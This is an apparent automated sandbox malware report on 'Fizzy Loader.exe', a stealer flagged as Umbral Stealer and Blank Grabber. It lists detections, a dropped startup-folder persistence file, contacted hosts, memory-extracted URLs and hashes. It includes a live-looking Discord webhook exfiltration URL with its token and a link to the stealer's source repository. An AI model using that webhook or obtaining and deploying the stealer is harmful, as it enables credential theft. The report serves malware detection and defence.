                        Screenshots

                        Thumbnails

                        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                        windows-stand

                        Antivirus, Machine Learning and Genetic Malware Detection

                        Initial Sample

                        SourceDetectionScannerLabelLink
                        Fizzy Loader.exe74%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer
                        Fizzy Loader.exe100%AviraHEUR/AGEN.1307507
                        Fizzy Loader.exe100%Joe Sandbox ML

                        Dropped Files

                        SourceDetectionScannerLabelLink
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr100%AviraHEUR/AGEN.1307507
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr100%Joe Sandbox ML
                        C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr74%ReversingLabsByteCode-MSIL.Trojan.UmbralStealer

                        Unpacked PE Files

                        No Antivirus matches

                        Domains

                        No Antivirus matches

                        URLs

                        No Antivirus matches

                        Domains and IPs

                        Contacted Domains

                        NameIPActiveMaliciousAntivirus DetectionReputation
                        discord.com
                        		162.159.138.232
                        		truefalse
                          		high
                          ip-api.com
                          		208.95.112.1
                          		truefalse
                            		high

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYxfalse
                              		high
                              http://ip-api.com/line/?fields=hostingfalse
                                		high

                                URLs from Memory and Binaries

                                NameSourceMaliciousAntivirus DetectionReputation
                                https://mail.google.com/mail/?usp=installed_webappFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://mail.google.com/mail/installwebapp?usp=chrome_defaultFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://docs.google.com/presentation/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://docs.google.com/document/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        https://drive.google.com/drive/installwebapp?usp=chrome_defaultFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://contoso.com/Licensepowershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://discordapp.com/api/v9/users/Fizzy Loader.exe, ukUGV.scr.0.drfalse
                                              		high
                                              https://www.youtube.com/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://discord.comFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CD0000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://mail.google.com/mail/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://docs.google.com/document/installwebapp?usp=chrome_defaultFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://discord.com/api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0D0D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://docs.google.com/presentation/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://docs.google.com/presentation/installwebapp?usp=chrome_defaultFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://docs.google.com/document/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://docs.google.com/spreadsheets/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://docs.google.com/spreadsheets/?usp=installed_webappFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://mail.google.com/mail/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://contoso.com/powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://nuget.org/nuget.exepowershell.exe, 00000006.00000002.2087596667.0000027715CA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D061A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.000002051007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.00000205019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACCECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        https://docs.google.com/spreadsheets/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://drive.google.com/?lfhs=2Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://ip-api.comFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BA3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://oneget.orgXpowershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.youtube.com/s/notifications/manifest/cr_install.htmlFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0B41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2065728225.0000027705C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F8AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D0600E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABCE51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://www.youtube.com/?feature=ytcaFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      http://ip-api.com/line/?fields=hostingI7AB5C494-39F5-4941-9163-47F54D6D5016I032E02B4-0499-05C3-0806-Fizzy Loader.exe, ukUGV.scr.0.drfalse
                                                                                        		high
                                                                                        https://www.youtube.com/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          http://nuget.org/NuGet.exepowershell.exe, 00000006.00000002.2087596667.0000027715CA2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070295000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D061A9A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2203387646.000001D070152000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.000002051007E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.00000205019B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2319277381.00000205101B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACCECD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE718000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://discord.comFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE3000.00000004.00000800.00020000.00000000.sdmp, Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://discord.com/api/v10/users/ukUGV.scr.0.drfalse
                                                                                                  		high
                                                                                                  https://drive.google.com/:Fizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000006.00000002.2065728225.0000027705E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          		high
                                                                                                          https://contoso.com/Iconpowershell.exe, 00000016.00000002.2545198762.000001EACD004000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            		high
                                                                                                            https://drive.google.com/JFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000016.00000002.2405447937.000001EABE6BE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://github.com/Blank-c/Umbral-StealerukUGV.scr.0.drfalse
                                                                                                                  		high
                                                                                                                  http://crl.mpowershell.exe, 0000000E.00000002.2341533446.000002056E05D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://docs.google.com/spreadsheets/installwebapp?usp=chrome_defaultFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://github.com/Blank-c/Umbral-StealerhTFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000006.00000002.2065728225.0000027705E59000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://docs.google.com/presentation/?usp=installed_webappFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://aka.ms/pscore68powershell.exe, 00000006.00000002.2065728225.0000027705C31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F7D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2107422944.000001CC0F7EF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2147361329.000001D0600E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020500001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABCE51000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://ip-api.com/json/?fields=225545PFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://docs.google.com/document/?usp=installed_webappFizzy Loader.exe, 00000000.00000002.2624137126.00000172B0DAF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://oneget.orgpowershell.exe, 0000000B.00000002.2147361329.000001D061707000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2228868697.0000020501793000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000016.00000002.2405447937.000001EABE2F0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://ip-api.com/json/?fields=225545Fizzy Loader.exe, ukUGV.scr.0.drfalse
                                                                                                                                      		high

                                                                                                                                      World Map of Contacted IPs

                                                                                                                                      • No. of IPs < 25%
                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                      • 75% < No. of IPs

                                                                                                                                      Public IPs

                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                      208.95.112.1
                                                                                                                                      		ip-api.comUnited States
                                                                                                                                      		53334TUT-ASUSfalse
                                                                                                                                      162.159.138.232
                                                                                                                                      		discord.comUnited States
                                                                                                                                      		13335CLOUDFLARENETUSfalse

                                                                                                                                      General Information

                                                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                                                      Analysis ID:1582592
                                                                                                                                      Start date and time:2024-12-31 00:49:05 +01:00
                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                      Overall analysis duration:0h 7m 8s
                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                      Report type:full
                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                      Number of analysed new started processes analysed:30
                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                      Technologies:
                                                                                                                                      • HCA enabled
                                                                                                                                      • EGA enabled
                                                                                                                                      • AMSI enabled
                                                                                                                                      Analysis Mode:default
                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                      Sample name:Fizzy Loader.exe
                                                                                                                                      Detection:MAL
                                                                                                                                      Classification:mal100.troj.adwa.spyw.evad.winEXE@40/24@3/2
                                                                                                                                      EGA Information:
                                                                                                                                      • Successful, ratio: 16.7%
                                                                                                                                      HCA Information:
                                                                                                                                      • Successful, ratio: 67%
                                                                                                                                      • Number of executed functions: 224
                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                      Cookbook Comments:
                                                                                                                                      • Found application associated with file extension: .exe

                                                                                                                                      Warnings

                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                      • Excluded IPs from analysis (whitelisted): 142.250.185.195, 52.149.20.212, 13.107.246.45
                                                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, gstatic.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1308 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1892 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 428 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 5688 because it is empty
                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6156 because it is empty
                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                      • VT rate limit hit for: Fizzy Loader.exe

                                                                                                                                      Simulations

                                                                                                                                      Behavior and APIs

                                                                                                                                      TimeTypeDescription
                                                                                                                                      18:49:52API Interceptor5x Sleep call for process: WMIC.exe modified
                                                                                                                                      18:49:55API Interceptor28x Sleep call for process: powershell.exe modified
                                                                                                                                      18:49:56API Interceptor6578x Sleep call for process: Fizzy Loader.exe modified

                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                      IPs

                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      208.95.112.1Extreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                      • ip-api.com/json/?fields=61439
                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                      • ip-api.com/json/?fields=61439
                                                                                                                                      987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • ip-api.com/line/?fields=hosting
                                                                                                                                      good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • ip-api.com/json/
                                                                                                                                      DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                      • ip-api.com/json/?fields=225545
                                                                                                                                      main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                      • ip-api.com/json/8.46.123.189?fields=192511
                                                                                                                                      main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • ip-api.com/json/8.46.123.189?fields=192511
                                                                                                                                      162.159.138.232dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                        DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                          http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                            webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                                                              chos.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                apDMcnqqWs.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  Cooperative Agreement0000800380.docx.exeGet hashmaliciousBabadeda, Blank GrabberBrowse
                                                                                                                                                    speedymaqing.exeGet hashmaliciousPython Stealer, Discord Token StealerBrowse
                                                                                                                                                      RuntimeusererVers.exeGet hashmaliciousPython StealerBrowse
                                                                                                                                                        file.exeGet hashmaliciousCStealerBrowse

                                                                                                                                                          Domains

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          discord.comJx6bD8nM4qW9sL3v.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.128.233
                                                                                                                                                          dsoft.exeGet hashmaliciousPython Stealer, Creal StealerBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          http://mee6.xyzGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.136.232
                                                                                                                                                          YF3YnL4ksc.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.136.232
                                                                                                                                                          arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.137.232
                                                                                                                                                          webhook.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          zapret.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.136.232
                                                                                                                                                          Bloxflip Predictor.exeGet hashmaliciousNjratBrowse
                                                                                                                                                          • 162.159.137.232
                                                                                                                                                          ip-api.comExtreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          main.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 208.95.112.1

                                                                                                                                                          ASNs

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          CLOUDFLARENETUSLoader.exeGet hashmaliciousMeduza StealerBrowse
                                                                                                                                                          • 104.26.13.205
                                                                                                                                                          https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                          • 104.17.25.14
                                                                                                                                                          Set-up.exeGet hashmaliciousLummaC, GO Backdoor, LummaC StealerBrowse
                                                                                                                                                          • 188.114.97.3
                                                                                                                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.177.88
                                                                                                                                                          X-mas_2.3.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 172.67.190.223
                                                                                                                                                          ReploidReplic.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.48.1
                                                                                                                                                          https://compliance-central.com/route/ed5305641af2fd214861ba268e4a42aa2938b075/Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 1.1.1.1
                                                                                                                                                          Launcher.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.96.1
                                                                                                                                                          GTA-5-Mod-Menu-2025.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.96.1
                                                                                                                                                          AquaDiscord-2.0.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 104.21.16.1
                                                                                                                                                          TUT-ASUSExtreme Injector v3.exeGet hashmaliciousXWormBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          VegaStealer_v2.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA Stealer, XmrigBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          SharcHack.exeGet hashmaliciousAdes Stealer, BlackGuard, NitroStealer, VEGA StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          987656789009800.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          good.exeGet hashmaliciousPureLog Stealer, zgRATBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          http://au.kirmalk.com/watch.php?vid=7750fd3c8Get hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.252.214.4
                                                                                                                                                          Client-built.exeGet hashmaliciousQuasarBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          DHL AWB-documents.lnkGet hashmaliciousDivulge StealerBrowse
                                                                                                                                                          • 208.95.112.1
                                                                                                                                                          main.exeGet hashmaliciousPython Stealer, Discord Token Stealer, PRYSMAX STEALERBrowse
                                                                                                                                                          • 208.95.112.1

                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                          3b5074b1b5d032e5620f69f9f700ff0eEpsilon.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          XClient.exeGet hashmaliciousXWormBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          hoEtvOOrYH.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          web44.mp4.htaGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          eXbhgU9.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          Supplier.batGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          Supplier.batGet hashmaliciousLodaRAT, XRedBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          NEW-DRAWING-SHEET.batGet hashmaliciousUnknownBrowse
                                                                                                                                                          • 162.159.138.232
                                                                                                                                                          Requested Documentation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                                                                          • 162.159.138.232

                                                                                                                                                          Dropped Files

                                                                                                                                                          No context

                                                                                                                                                          Created / dropped Files

                                                                                                                                                          C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr

                                                                                                                                                          Download File
                                                                                                                                                          Process:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):235008
                                                                                                                                                          Entropy (8bit):6.0522746277225234
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:6144:dloZM+rIkd8g+EtXHkv/iD4M7+QWRJ6RvSgR1E9/gF8e1mfIi:/oZtL+EP8M7+QWRJ6RvSgR1Ecqx
                                                                                                                                                          MD5:B56AF795F8B7EDC6F35A9E905921ED0E
                                                                                                                                                          SHA1:C82CB0088BC9C93FD9A491AD278F410D44265A4D
                                                                                                                                                          SHA-256:46A67CDC899F61CCB6324D187D56B389F720D72BEB02594FD60FDC4A8CA62AB4
                                                                                                                                                          SHA-512:C35B429E243845337903FA5CC6853C6921514B2FCD84E7788607AA47414BE9B2101C8B87ACD1766666DAA7FC0CDD2B7A5BE19AC5754DB8F12C3E262EA792F9C6
                                                                                                                                                          Malicious:true
                                                                                                                                                          Yara Hits:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ukUGV.scr, Author: Joe Security
